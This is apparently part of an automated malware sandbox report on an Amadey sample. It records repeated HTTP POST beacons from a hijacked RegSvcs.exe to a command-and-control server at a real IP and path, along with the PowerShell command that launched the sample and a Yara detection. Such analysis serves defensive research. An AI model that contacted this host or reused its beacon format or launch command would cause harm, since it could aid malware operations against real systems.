                                                    Jan 8, 2025 08:45:18.469571114 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:19.163832903 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:19 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    87192.168.2.456144176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:20.688467979 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:21.393930912 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:21 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    88192.168.2.456145176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:23.063477039 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:23.755655050 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:23 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    89192.168.2.456146176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:25.270421028 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:25.968200922 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:25 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    90192.168.2.456147176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:27.595093966 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:28.306273937 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:28 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    91192.168.2.456148176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:29.828583002 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:30.519975901 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:30 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    92192.168.2.456149176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:32.163258076 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:32.853739977 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:32 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    93192.168.2.456150176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:34.376355886 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:35.080810070 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:34 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    94192.168.2.456151176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:36.747241020 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:37.467457056 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:37 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    95192.168.2.456152176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:38.986635923 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:39.706770897 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:39 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    96192.168.2.456153176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:41.348551035 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:42.036473036 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:41 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    97192.168.2.456154176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:43.548326015 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:44.265183926 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:44 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    98192.168.2.456155176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:45.907608032 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:46.605041981 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:46 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    99192.168.2.456156176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:48.125080109 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:48.840301991 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:48 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    100192.168.2.456157176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:50.469605923 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:51.176527977 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:51 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    101192.168.2.456158176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:52.703536987 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:53.412576914 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:53 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    102192.168.2.456159176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:55.055404902 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:45:55.740772963 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:55 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    103192.168.2.456160176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:57.256735086 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:45:57.976516962 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:45:57 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    104192.168.2.456161176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:45:59.609930038 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:46:00.308507919 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:46:00 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    105192.168.2.456162176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:46:01.828758955 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:46:02.527359962 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:46:02 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:02:41:55
                                                    Start date:08/01/2025
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\nYT1CaXH9N.ps1"
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: 00000000.00000002.1864550591.00000296DBC33000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:1
                                                    Start time:02:41:55
                                                    Start date:08/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:2
                                                    Start time:02:41:57
                                                    Start date:08/01/2025
                                                    Path:C:\Windows\System32\ipconfig.exe
